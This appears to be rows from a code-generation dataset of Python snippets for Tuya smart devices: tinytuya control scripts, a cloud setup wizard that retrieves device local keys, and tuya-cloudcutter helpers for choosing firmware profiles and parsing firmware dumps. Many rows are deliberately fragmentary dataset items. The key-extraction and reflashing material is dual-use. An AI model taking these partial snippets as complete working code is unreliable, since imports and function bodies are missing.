import sys
import time
import os
import tornado.httpserver
import tornado.ioloop
import tornado.web
from pskcontext import PSKContext
from tuyacipher import TuyaCipher
def object_to_json(obj):
return json.dumps(obj, separators=(',',':')) | null |
188,496 | import tinytuya
import json
import time
tuyadevices = []
for i in tuyadevices:
item = {}
name = i['name']
(ip, ver) = getIP(devices, i['id'])
item['name'] = name
item['ip'] = ip
item['ver'] = ver
item['id'] = i['id']
item['key'] = i['key']
if (ip == 0):
print(" %s[%s] - %s%s - %sError: No IP found%s" %
(subbold, name, dim, ip, alert, normal))
else:
try:
d = tinytuya.OutletDevice(i['id'], ip, i['key'])
if ver == "3.3":
d.set_version(3.3)
data = d.status()
if 'dps' in data:
item['dps'] = data
state = alertdim + "Off" + dim
try:
if '1' in data['dps'] or '20' in data['dps']:
state = bold + "On" + dim
print(" %s[%s] - %s%s - %s - DPS: %r" %
(subbold, name, dim, ip, state, data['dps']))
else:
print(" %s[%s] - %s%s - DPS: %r" %
(subbold, name, dim, ip, data['dps']))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
else:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
polling.append(item)
def tuyaLookup(deviceid):
for i in tuyadevices:
if (i['id'] == deviceid):
return (i['name'], i['key'])
return ("", "") | null |
188,497 | import tinytuya
import json
import time
def getIP(d, gwid):
for ip in d:
if (gwid == d[ip]['gwId']):
return (ip, d[ip]['version'])
return (0, 0) | null |
188,498 | import tinytuya
import json
import time
print("%-25s %-24s %-16s %-17s %-5s" % ("Name","ID", "IP","Key","Version"))
for item in data["devices"]:
print("%-25.25s %-24s %-16s %-17s %-5s" % (
item["name"],
item["id"],
item["ip"],
item["key"],
item["ver"]))
for item in data["devices"]:
print("\nDevice: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
status = d.status()
print(status)
def turn_on(name):
# find the right item that matches name
for item in data["devices"]:
if item["name"] == name:
break
print("\nTurning On: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
d.set_status(True) | null |
188,499 | import tinytuya
import json
import time
print("%-25s %-24s %-16s %-17s %-5s" % ("Name","ID", "IP","Key","Version"))
for item in data["devices"]:
print("%-25.25s %-24s %-16s %-17s %-5s" % (
item["name"],
item["id"],
item["ip"],
item["key"],
item["ver"]))
for item in data["devices"]:
print("\nDevice: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
status = d.status()
print(status)
def turn_off(name):
# find the right item that matches name
for item in data["devices"]:
if item["name"] == name:
break
print("\nTurning Off: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
d.set_status(False) | null |
188,500 | import tinytuya
import colorsys
import time
id = DEVICEID
cmd_code = 'colour_data_v2'
c = tinytuya.Cloud()
def set_color(rgb):
hsv = colorsys.rgb_to_hsv(rgb[0] / 255.0, rgb[1] / 255.0, rgb[2] / 255.0)
commands = {
'commands': [{
'code': cmd_code,
'value': {
"h": int(hsv[0] * 360),
"s": int(hsv[1] * 1000),
"v": int(hsv[2] * 1000)
}
}]
}
c.sendcommand(id, commands) | null |
188,501 | import colorsys
from dataclasses import dataclass
from typing import Tuple, List, Literal
import tinytuya
def tuyahex2hsv(val: str):
return tinytuya.BulbDevice._hexvalue_to_hsv(val, bulb="B") | null |
188,502 | import colorsys
from dataclasses import dataclass
from typing import Tuple, List, Literal
import tinytuya
def hsv2tuyahex(h: float, s: float, v: float):
(r, g, b) = colorsys.hsv_to_rgb(h, s, v)
hexvalue = tinytuya.BulbDevice._rgb_to_hexvalue(
r * 255.0, g * 255.0, b * 255.0, bulb='B'
)
return hexvalue | null |
188,503 | import requests
import time
import hmac
import hashlib
import json
import pprint
import logging
import tinytuya
try:
input = raw_input
except NameError:
pass
def tuyaPlatform(apiRegion, apiKey, apiSecret, uri, token=None, new_sign_algorithm=True, body=None, headers=None):
"""Tuya IoT Platform Data Access
Parameters:
* region Tuya API Server Region: us, eu, cn, in, us-e, eu-w
* apiKey Tuya Platform Developer ID
* apiSecret Tuya Platform Developer secret
* uri Tuya Platform URI for this call
* token Tuya OAuth Token
Playload Construction - Header Data:
Parameter Type Required Description
client_id String Yes client_id
signature String Yes HMAC-SHA256 Signature (see below)
sign_method String Yes Message-Digest Algorithm of the signature: HMAC-SHA256.
t Long Yes 13-bit standard timestamp (now in milliseconds).
lang String No Language. It is zh by default in China and en in other areas.
access_token String * Required for service management calls
Signature Details:
* OAuth Token Request: signature = HMAC-SHA256(KEY + t, SECRET).toUpperCase()
* Service Management: signature = HMAC-SHA256(KEY + access_token + t, SECRET).toUpperCase()
URIs:
* Get Token = https://openapi.tuyaus.com/v1.0/token?grant_type=1
* Get UserID = https://openapi.tuyaus.com/v1.0/devices/{DeviceID}
* Get Devices = https://openapi.tuyaus.com/v1.0/users/{UserID}/devices
REFERENCE: https://images.tuyacn.com/smart/docs/python_iot_code_sample.py
"""
# Set hostname based on apiRegion
apiRegion = apiRegion.lower()
urlhost = "openapi.tuyacn.com" # China Data Center
if(apiRegion == "us"):
urlhost = "openapi.tuyaus.com" # Western America Data Center
if(apiRegion == "us-e"):
urlhost = "openapi-ueaz.tuyaus.com" # Eastern America Data Center
if(apiRegion == "eu"):
urlhost = "openapi.tuyaeu.com" # Central Europe Data Center
if(apiRegion == "eu-w"):
urlhost = "openapi-weaz.tuyaeu.com" # Western Europe Data Center
if(apiRegion == "in"):
urlhost = "openapi.tuyain.com" # India Datacenter
# Build URL
url = "https://%s/v1.0/%s" % (urlhost, uri)
# Build Header
now = int(time.time()*1000)
headers = dict(list(headers.items()) + [('Signature-Headers', ":".join(headers.keys()))]) if headers else {}
if(token==None):
payload = apiKey + str(now)
headers['secret'] = apiSecret
else:
payload = apiKey + token + str(now)
# If running the post 6-30-2021 signing algorithm update the payload to include it's data
if new_sign_algorithm: payload += ('GET\n' + # HTTPMethod
hashlib.sha256(bytes((body or "").encode('utf-8'))).hexdigest() + '\n' + # Content-SHA256
''.join(['%s:%s\n'%(key, headers[key]) # Headers
for key in headers.get("Signature-Headers", "").split(":")
if key in headers]) + '\n' +
'/' + url.split('//', 1)[-1].split('/', 1)[-1])
# Sign Payload
signature = hmac.new(
apiSecret.encode('utf-8'),
msg=payload.encode('utf-8'),
digestmod=hashlib.sha256
).hexdigest().upper()
# Create Header Data
headers['client_id'] = apiKey
headers['sign'] = signature
headers['t'] = str(now)
headers['sign_method'] = 'HMAC-SHA256'
if(token != None):
headers['access_token'] = token
# Get Token
response = requests.get(url, headers=headers)
try:
response_dict = json.loads(response.content.decode())
except:
try:
response_dict = json.loads(response.content)
except:
print("Failed to get valid JSON response")
return(response_dict)
The provided code snippet includes necessary dependencies for implementing the `wizard` function. Write a Python function `def wizard(color=True, retries=None)` to solve the following problem:
TinyTuya Setup Wizard Tuya based WiFi smart devices Parameter: color = True or False, print output in color [Default: True] retries = Number of retries to find IP address of Tuya Devices Description Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of the Device IDs and their Local KEYs. It will save the credentials and the device data in the tinytuya.json and devices.json configuration files respectively. HOW to set up your Tuya IoT Developer account: iot.tuya.com: https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key Credits * Tuya API Documentation https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg * TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes The TuyAPI/CLI wizard inspired and informed this python version.
Here is the function:
def wizard(color=True, retries=None):
"""
TinyTuya Setup Wizard Tuya based WiFi smart devices
Parameter:
color = True or False, print output in color [Default: True]
retries = Number of retries to find IP address of Tuya Devices
Description
Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of
the Device IDs and their Local KEYs. It will save the credentials and the device
data in the tinytuya.json and devices.json configuration files respectively.
HOW to set up your Tuya IoT Developer account: iot.tuya.com:
https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key
Credits
* Tuya API Documentation
https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg
* TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes
The TuyAPI/CLI wizard inspired and informed this python version.
"""
# Get Configuration Data
CONFIGFILE = 'tinytuya.json'
DEVICEFILE = 'devices.json'
RAWFILE = 'tuya-raw.json'
SNAPSHOTFILE = 'snapshot.json'
config = {}
config['apiKey'] = ''
config['apiSecret'] = ''
config['apiRegion'] = ''
config['apiDeviceID'] = ''
needconfigs = True
try:
# Load defaults
with open(CONFIGFILE) as f:
config = json.load(f)
except:
# First Time Setup
pass
if(color == False):
# Disable Terminal Color Formatting
bold = subbold = normal = dim = alert = alertdim = ""
else:
# Terminal Color Formatting
bold = "\033[0m\033[97m\033[1m"
subbold = "\033[0m\033[32m"
normal = "\033[97m\033[0m"
dim = "\033[0m\033[97m\033[2m"
alert = "\033[0m\033[91m\033[1m"
alertdim = "\033[0m\033[91m\033[2m"
print(bold + 'TinyTuya Setup Wizard' + dim + ' [%s]' % (tinytuya.version) + normal)
print('')
if(config['apiKey'] != '' and config['apiSecret'] != '' and
config['apiRegion'] != '' and config['apiDeviceID'] != ''):
needconfigs = False
print(" " + subbold + "Existing settings:" + dim +
"\n API Key=%s \n Secret=%s\n DeviceID=%s\n Region=%s" %
(config['apiKey'], config['apiSecret'], config['apiDeviceID'],
config['apiRegion']))
print('')
answer = input(subbold + ' Use existing credentials ' +
normal + '(Y/n): ')
if(answer[0:1].lower() == 'n'):
needconfigs = True
if(needconfigs):
# Ask user for config settings
print('')
config['apiKey'] = input(subbold + " Enter " + bold + "API Key" + subbold +
" from tuya.com: " + normal)
config['apiSecret'] = input(subbold + " Enter " + bold + "API Secret" + subbold +
" from tuya.com: " + normal)
config['apiDeviceID'] = input(subbold +
" Enter " + bold + "any Device ID" + subbold +
" currently registered in Tuya App (used to pull full list): " + normal)
# TO DO - Determine apiRegion based on Device - for now, ask
print("\n " + subbold + "Region List" + dim +
"\n cn\tChina Data Center" +
"\n us\tUS - Western America Data Center" +
"\n us-e\tUS - Eastern America Data Center" +
"\n eu\tCentral Europe Data Center" +
"\n eu-w\tWestern Europe Data Center" +
"\n in\tIndia Data Center\n")
config['apiRegion'] = input(subbold + " Enter " + bold + "Your Region" + subbold +
" (Options: cn, us, us-e, eu, eu-w, or in): " + normal)
# Write Config
json_object = json.dumps(config, indent=4)
with open(CONFIGFILE, "w") as outfile:
outfile.write(json_object)
print(bold + "\n>> Configuration Data Saved to " + CONFIGFILE)
print(dim + json_object)
KEY = config['apiKey']
SECRET = config['apiSecret']
DEVICEID = config['apiDeviceID']
REGION = config['apiRegion'] # us, eu, cn, in
LANG = 'en' # en or zh
# Get Oauth Token from tuyaPlatform
uri = 'token?grant_type=1'
response_dict = tuyaPlatform(REGION, KEY, SECRET, uri)
if not response_dict['success']:
print('\n\n' + bold + 'Error from Tuya server: ' + dim + response_dict['msg'])
return
token = response_dict['result']['access_token']
# Get UID from sample Device ID
uri = 'devices/%s' % DEVICEID
response_dict = tuyaPlatform(REGION, KEY, SECRET, uri, token)
if not response_dict['success']:
print('\n\n' + bold + 'Error from Tuya server: ' + dim + response_dict['msg'])
return
uid = response_dict['result']['uid']
# Use UID to get list of all Devices for User
uri = 'users/%s/devices' % uid
json_data = tuyaPlatform(REGION, KEY, SECRET, uri, token)
# Filter to only Name, ID and Key
tuyadevices = []
for i in json_data['result']:
item = {}
item['name'] = i['name'].strip()
item['id'] = i['id']
item['key'] = i['local_key']
tuyadevices.append(item)
# Display device list
print("\n\n" + bold + "Device Listing\n" + dim)
output = json.dumps(tuyadevices, indent=4) # sort_keys=True)
print(output)
# Save list to devices.json
print(bold + "\n>> " + normal + "Saving list to " + DEVICEFILE)
with open(DEVICEFILE, "w") as outfile:
outfile.write(output)
print(dim + " %d registered devices saved" % len(tuyadevices))
# Save raw TuyaPlatform data to tuya-raw.json
print(bold + "\n>> " + normal + "Saving raw TuyaPlatform response to " + RAWFILE)
try:
with open(RAWFILE, "w") as outfile:
outfile.write(json.dumps(json_data, indent=4))
except:
print('\n\n' + bold + 'Unable to save raw file' + dim )
# Find out if we should poll all devices
answer = input(subbold + '\nPoll local devices? ' +
normal + '(Y/n): ')
if(answer[0:1].lower() != 'n'):
# Set retries based on number of devices if undefined
if(retries == None):
retries = len(tuyadevices)+10+tinytuya.MAXCOUNT
# Scan network for devices and provide polling data
print(normal + "\nScanning local network for Tuya devices (retry %d times)..." % retries)
devices = tinytuya.deviceScan(False, retries)
print(" %s%s local devices discovered%s" %
(dim, len(devices), normal))
print("")
def getIP(d, gwid):
for ip in d:
if 'gwId' in d[ip]:
if (gwid == d[ip]['gwId']):
return (ip, d[ip]['version'])
return (0, 0)
polling = []
print("Polling local devices...")
for i in tuyadevices:
item = {}
name = i['name']
(ip, ver) = getIP(devices, i['id'])
item['name'] = name
item['ip'] = ip
item['ver'] = ver
item['id'] = i['id']
item['key'] = i['key']
if (ip == 0):
print(" %s[%s] - %s%s - %sError: No IP found%s" %
(subbold, name, dim, ip, alert, normal))
else:
try:
d = tinytuya.OutletDevice(i['id'], ip, i['key'])
if ver == "3.3":
d.set_version(3.3)
data = d.status()
if 'dps' in data:
item['dps'] = data
state = alertdim + "Off" + dim
try:
if '1' in data['dps'] or '20' in data['dps']:
if '1' in data['dps']:
if data['dps']['1'] == True:
state = bold + "On" + dim
if '20' in data['dps']:
if data['dps']['20'] == True:
state = bold + "On" + dim
print(" %s[%s] - %s%s - %s - DPS: %r" %
(subbold, name, dim, ip, state, data['dps']))
else:
print(" %s[%s] - %s%s - DPS: %r" %
(subbold, name, dim, ip, data['dps']))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
else:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
polling.append(item)
# for loop
# Save polling data snapsot
current = {'timestamp' : time.time(), 'devices' : polling}
output = json.dumps(current, indent=4)
print(bold + "\n>> " + normal + "Saving device snapshot data to " + SNAPSHOTFILE)
with open(SNAPSHOTFILE, "w") as outfile:
outfile.write(output)
print("\nDone.\n")
return | TinyTuya Setup Wizard Tuya based WiFi smart devices Parameter: color = True or False, print output in color [Default: True] retries = Number of retries to find IP address of Tuya Devices Description Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of the Device IDs and their Local KEYs. It will save the credentials and the device data in the tinytuya.json and devices.json configuration files respectively. HOW to set up your Tuya IoT Developer account: iot.tuya.com: https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key Credits * Tuya API Documentation https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg * TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes The TuyAPI/CLI wizard inspired and informed this python version. |
188,504 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def ask_options(text, options):
res = inquirer.prompt(
[
inquirer.List(
"result",
carousel=True,
message=text,
choices=options,
)
]
)
if res is None:
# Ctrl+C
exit(1)
return res["result"]
def ask_files(text, dir):
files = [
path
for path in listdir(dir)
if not path.startswith(".") and isfile(join(dir, path))
]
path = ask_options(text, sorted(files, key=str.casefold))
return abspath(join(dir, path)) | null |
188,505 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def cli(ctx, workdir: str, output: click.File):
ctx.ensure_object(dict)
ctx.obj["firmware_dir"] = join(workdir, "custom-firmware")
ctx.obj["profiles_dir"] = join(workdir, "device-profiles")
ctx.obj["output"] = output | null |
188,506 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def download_profile(device_slug):
def save_profile(profile_dir, device, profile):
def load_profile(profile_dir):
def save_combined_profile(profile_dir, device, profile):
def write_profile(ctx, slug: str):
device_slug = slug
profiles_dir = ctx.obj["profiles_dir"]
profile_dir = join(profiles_dir, device_slug)
# try to find device and profile JSON files
device, profile = None, None
if isdir(profile_dir):
device, profile = load_profile(profile_dir)
if device is None or profile is None:
print(
"Custom device or profile is not present, "
"attempting to download from API."
)
if device is None or profile is None:
device, profile = download_profile(device_slug)
save_profile(profile_dir, device, profile)
# write profile data if found
path = save_combined_profile(profile_dir, device, profile)
ctx.obj["output"].write(path) | null |
188,507 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def api_get(path):
with requests.get(f"https://tuya-cloudcutter.github.io/api/{path}") as r:
if r.status_code == 404:
print("The specified device does not exist in the API.")
exit(1)
if r.status_code != 200:
print("API request failed. Make sure you have an Internet connection.")
exit(1)
return r.json()
def ask_options(text, options):
res = inquirer.prompt(
[
inquirer.List(
"result",
carousel=True,
message=text,
choices=options,
)
]
)
if res is None:
# Ctrl+C
exit(1)
return res["result"]
def ask_dirs(text, dir):
files = [
path
for path in listdir(dir)
if not path.startswith(".") and isdir(join(dir, path)) and path != "schema"
]
path = ask_options(text, sorted(files, key=str.casefold))
return abspath(join(dir, path))
def ask_device_base(devices):
brands = sorted(set(device["manufacturer"] for device in devices))
manufacturer = ask_options("Select the brand of your device", brands)
names = sorted(
set(
device["name"]
for device in devices
if device["manufacturer"] == manufacturer
)
)
name = ask_options("Select the article number of your device", names)
return next(
device
for device in devices
if device["manufacturer"] == manufacturer and device["name"] == name
)
def ask_profile_base(profiles):
profiles = {
f"{profile['name']} / {profile['sub_name']}": profile
for profile in profiles
if profile["type"] == "CLASSIC"
}
names = sorted(set(profiles.keys()))
name = ask_options("Select the firmware version and name", names)
return profiles[name]
def save_profile(profile_dir, device, profile):
makedirs(profile_dir, exist_ok=True)
with open(join(profile_dir, "device.json"), "w") as f:
json.dump(device, f, indent="\t")
with open(join(profile_dir, "profile.json"), "w") as f:
json.dump(profile, f, indent="\t")
def load_profile(profile_dir):
device, profile = None, None
for file in glob(join(profile_dir, "*.json")):
with open(file, "r") as f:
try:
data = json.load(f)
except:
print(
f"File {file} does not contain valid JSON. "
"Please update your file and try again."
)
exit(53)
# match characteristic keys
if "profiles" in data:
device = data
continue
if "firmware" in data:
profile = data
continue
if device and profile:
break
return device, profile
def save_combined_profile(profile_dir, device, profile):
makedirs(profile_dir, exist_ok=True)
combined = {
"slug": basename(profile_dir),
"device": device,
"profile": profile,
}
combined_path = join(profile_dir, "combined.json")
with open(combined_path, "w") as f:
json.dump(combined, f, indent="\t")
return abspath(combined_path)
def choose_profile(ctx, flashing: bool = False):
profiles_dir = ctx.obj["profiles_dir"]
device_slug = None
opts = [
"By manufacturer/device name",
"By firmware version and name",
"From device-profiles (i.e. custom profile)",
]
mode = ask_options("How do you want to choose the device?", opts)
if mode == opts[0]:
device_slug = ask_device_base(api_get("devices.json"))["slug"]
device = api_get(f"devices/{device_slug}.json")
profiles = device["profiles"]
profile_slug = ask_profile_base(profiles)["slug"]
profile = api_get(f"profiles/{profile_slug}.json")
elif mode == opts[1]:
profile_slug = ask_profile_base(api_get("profiles.json"))["slug"]
profile = api_get(f"profiles/{profile_slug}.json")
devices = profile["devices"]
if flashing:
device_slug = devices[0]["slug"]
else:
device_slug = ask_device_base(devices)["slug"]
device = api_get(f"devices/{device_slug}.json")
elif mode == opts[2]:
profile_dir = ask_dirs("Select device profile", profiles_dir)
device, profile = load_profile(profile_dir)
else:
exit(2)
if device_slug is not None:
profile_dir = join(profiles_dir, device_slug)
save_profile(profile_dir, device, profile)
path = save_combined_profile(profile_dir, device, profile)
ctx.obj["output"].write(path) | null |
188,508 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
class FirmwareType(Enum):
UF2_UG_SUFFIX = "-extracted.ug.bin"
def ask_options(text, options):
def validate_firmware_file_internal(firmware: str, chip: str = None) -> FirmwareType:
def extract_uf2(file_with_path: str, firmware_dir: str, chip: str) -> str:
def choose_firmware(ctx, chip: str = None):
chip = chip and chip.upper()
firmware_dir = ctx.obj["firmware_dir"]
files = listdir(firmware_dir)
options = {}
invalid_filenames = {}
for file in files:
if file.startswith(".") or file.endswith(".md"):
continue
if file.endswith(UF2_UG_SUFFIX):
continue
path = join(firmware_dir, file)
fw_type = validate_firmware_file_internal(path, chip and chip.lower())
if fw_type in [FirmwareType.VALID_UG, FirmwareType.VALID_UF2]:
options[file] = fw_type
elif fw_type in [FirmwareType.INVALID]:
invalid_filenames[file] = file
if not options:
print(
"No valid custom firmware files were found!\n"
"Add files to the custom-firmware/ directory first.",
file=sys.stderr,
)
exit(1)
if invalid_filenames:
print("\nThe following files were ignored because they do not meet naming requirements and the chip type could not be determined:")
for invalid_filename in invalid_filenames:
print(invalid_filename)
print("Please see https://github.com/tuya-cloudcutter/tuya-cloudcutter/tree/main/custom-firmware#naming-rules for more information.\n")
prompt = "Select your custom firmware file"
if chip:
prompt += f" for {chip} chip"
file = ask_options(prompt, sorted(options.keys(), key=str.casefold))
file_with_path = abspath(join(firmware_dir, file))
fw_type = options[file]
if fw_type == FirmwareType.VALID_UF2:
file_with_path = extract_uf2(file_with_path, firmware_dir, chip)
ctx.obj["output"].write(basename(file_with_path)) | null |
188,509 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
class FirmwareType(Enum):
INVALID = 0
IGNORED_HEADER = 1
IGNORED_FILENAME = 2
VALID_UG = 3
VALID_UF2 = 4
def validate_firmware_file_internal(firmware: str, chip: str = None) -> FirmwareType:
FILE_MAGIC_DICT = {
b"RBL\x00": "RBL",
b"\x43\x09\xb5\x96": "QIO",
b"\x2f\x07\xb5\x94": "UA",
b"\x55\xAA\x55\xAA": "UG",
b"UF2\x0A": "UF2",
}
base = basename(firmware)
with open(firmware, "rb") as fs:
header = fs.read(512)
magic = header[0:4]
if magic not in FILE_MAGIC_DICT or len(header) < 512:
print(
f"!!! Unrecognized file type - '{base}' is not a UG or UF2 file.",
file=sys.stderr,
)
return FirmwareType.INVALID
file_type = FILE_MAGIC_DICT[magic]
if file_type not in ["UG", "UF2"]:
print(
f"!!! File {base} is a '{file_type}' file! Please provide an UG file.",
file=sys.stderr,
)
return FirmwareType.INVALID
if file_type == "UG":
# check LibreTiny UG version tag (chip type)
rbl_ver = header[32 + 12 + 16 : 32 + 12 + 16 + 24]
if b"bk7231" in rbl_ver:
if chip and chip.encode() not in rbl_ver:
# wrong chip type
return FirmwareType.IGNORED_HEADER
# correct chip type
return FirmwareType.VALID_UG
# check chip by filename
if "bk7231" in base.lower():
if chip and chip not in base.lower():
# wrong chip type
return FirmwareType.IGNORED_FILENAME
# correct chip type
return FirmwareType.VALID_UG
print(
f"!!! Can't verify chip type of UG file '{base}' - "
"make sure that BK7231T or BK7231N is present in the filename!",
file=sys.stderr,
)
return FirmwareType.INVALID
if file_type == "UF2":
if not chip:
return FirmwareType.IGNORED_HEADER
try:
from ltchiptool import get_version
from uf2tool.models import Block
except (ImportError, ModuleNotFoundError) as e:
print(
f"!!! Can't read file '{base}' because ltchiptool is not installed. "
"Ignoring UF2 file.",
file=sys.stderr,
)
return FirmwareType.INVALID
get_version()
block = Block()
block.decode(header)
if UF2_FAMILY_MAP[chip] != block.family.id:
return FirmwareType.IGNORED_HEADER
return FirmwareType.VALID_UF2
def extract_uf2(file_with_path: str, firmware_dir: str, chip: str) -> str:
target = file_with_path + "-" + chip.lower() + UF2_UG_SUFFIX
print(f"Extracting UF2 package as '{basename(target)}'")
from ltchiptool.util.intbin import inttobe32
from uf2tool import OTAScheme, UploadContext
from uf2tool.models import UF2
with open(file_with_path, "rb") as f:
uf2 = UF2(f)
uf2.read()
uctx = UploadContext(uf2)
# BK7231 is single-OTA
data = uctx.collect_data(OTAScheme.DEVICE_SINGLE)
if len(data) != 1:
print("!!! Incompatible UF2 package - got too many chunks!")
exit(2)
_, io = data.popitem()
rbl = io.read()
file_with_path = abspath(join(firmware_dir, target))
with open(file_with_path, "wb") as f:
# build Tuya UG header
header = b"\x55\xAA\x55\xAA"
header += b"1.0.0".ljust(12, b"\x00")
header += inttobe32(len(rbl))
header += inttobe32(sum(rbl))
header += inttobe32(sum(header))
header += b"\xAA\x55\xAA\x55"
f.write(header)
# write RBL data
f.write(rbl)
return file_with_path
"-w",
"--workdir",
type=click.Path(exists=True, file_okay=False),
required=True,
def validate_firmware_file(ctx, filename: str, chip: str = None):
chip = chip and chip.upper()
firmware_dir = ctx.obj["firmware_dir"]
fw_type = validate_firmware_file_internal(join(firmware_dir, filename), chip and chip.lower())
if fw_type not in [FirmwareType.VALID_UG, FirmwareType.VALID_UF2]:
print(
f"The firmware file supplied ({filename}) is not valid for the chosen profile type of {chip}",
file=sys.stderr,
)
exit(1)
file_with_path = abspath(join(firmware_dir, filename))
if fw_type == FirmwareType.VALID_UF2:
file_with_path = extract_uf2(file_with_path, firmware_dir, chip)
ctx.obj["output"].write(basename(file_with_path)) | null |
188,510 | import json
import os.path
import sys
def dump(file):
def run(storage_file: str):
if not storage_file:
print('Usage: python parse_storage.py <storage.json file>')
sys.exit(1)
if os.path.exists(storage_file):
dump(storage_file)
else:
print('[!] Storage file not found')
return | null |
188,511 | import re
import sys
from os.path import basename, dirname, exists
def dump():
global base_name, base_folder
base_name = basename(appcode_path)[:-23]
base_folder = dirname(appcode_path)
sdk_line = ''
if b'< TUYA IOT SDK' in appcode:
sdk_line = read_until_null_or_newline(appcode.index(b'< TUYA IOT SDK'))
sdk_version = sdk_line.split()[4].split(':')[1]
print(f"[+] SDK: {sdk_version}")
with open(name_output_file("sdk"), 'w') as f:
f.write(sdk_version)
device_class_search_keys = [
b'oem_bk7231s_',
b'bk7231t_common_',
b'bk7231s_',
b'oem_bk7231n_',
b'bk7231n_common_',
b'_common_ty'
]
device_class = ''
for searchKey in device_class_search_keys:
device_class = find_device_class(searchKey)
if device_class != '':
break
if device_class == '':
device_class = search_device_class_after_compiled_line()
if device_class == '':
device_class = search_device_class_after_chipid("bk7231n")
if device_class == '':
device_class = search_device_class_after_chipid("BK7231NL")
if device_class == '':
device_class = search_device_class_after_chipid("bk7231t")
if device_class != '':
print(f"[+] Device class: {device_class}")
with open(name_output_file("device_class"), 'w') as f:
f.write(device_class)
if 'light_ty' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('lightbulb-outline')
elif '_plug' in device_class or '_dltj' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('power-plug')
elif 'strip' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('string-lights')
elif 'switch' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('toggle-switch-outline')
else:
with open(name_output_file("icon"), 'w') as f:
f.write('memory')
else:
print("[!] Unable to determine device class, please open an issue and include the bin file.")
# If swv doesn't exist from storage
if exists(name_output_file("swv")) == False:
swv = search_swv_after_compiled_line()
if swv == '':
swv = search_swv_after_device_class(device_class)
if swv != '':
print(f"[+] Version: {swv}")
with open(name_output_file("swv"), 'w') as f:
f.write(swv)
# If bv doesn't exist from storage
if exists(name_output_file("bv")) == False:
bv = sdk_line.split()[5].split('_')[0].split(':')[1]
if bv is not None and bv != '':
print(f"[+] bv: {bv}")
with open(name_output_file("bv"), 'w') as f:
f.write(bv)
# If key doesn't exist from storage
if exists(name_output_file("firmware_key")) == False:
key = search_key()
if key is not None and key != '':
print(f"[+] firmware_key: {key}")
with open(name_output_file("firmware_key"), 'w') as f:
f.write(key)
def run(device_folder: str):
if not device_folder:
print('Usage: python parse_app.py <dercypted app file>')
sys.exit(1)
global appcode_path, appcode
appcode_path = device_folder
with open(appcode_path, 'rb') as fs:
appcode = fs.read()
dump() | null |
188,512 | import argparse
import os
import os.path
import sys
import bk7231tools
def load_file(filename: str):
def run(full_encrypted_file: str):
if full_encrypted_file is None or full_encrypted_file == '':
print('Usage: python extract.py <full 2M encrypted bin file>')
sys.exit(1)
if not full_encrypted_file.__contains__('_') or full_encrypted_file.__contains__(' ') or not full_encrypted_file.endswith('.bin'):
print('Filename must match specific rules in order to properly generate a useful profile.')
print('The general format is Manufacturer-Name_Model-Number.bin')
print('manufacturer name followed by underscore (_) followed by model are required, and the extension should be .bin')
print('Dashes (-) should be used instead of spaces, and if there is a dash (-) in any part of the manufacturer or model, it must be replaced with 3 dashes (---) to be maintained.')
print('There should only be one underscore (_) present, separating manufacturer name and model')
print('Example: a Tuya Generic DS-101 would become Tuya-Generic_DS---101.bin')
print('Adding the general device type to the end of the model is recommended.')
print('Examples: Tuya-Generic_DS---101-Touch-Switch.bin or Tuya-Generic_A60-E26-RGBCT-Bulb.bin')
sys.exit(1)
global current_dir, extractfolder, foldername
current_dir = os.path.dirname(full_encrypted_file)
output_dir = full_encrypted_file.replace('.bin', '')
extractfolder = os.path.abspath(output_dir)
foldername = os.path.basename(output_dir)
input = argparse.ArgumentParser()
input.layout = 'ota_1'
input.rbl = ''
input.file = full_encrypted_file
input.output_dir = os.path.join(extractfolder)
input.extract = True
input.storage = False
if not os.path.exists(extractfolder) or not os.path.exists(os.path.join(extractfolder, foldername + "_app_1.00_decrypted.bin")):
bk7231tools.__main__.dissect_dump_file(input)
dirListing = os.listdir(extractfolder)
for file in dirListing:
if file.endswith('app_pattern_scan.bin'):
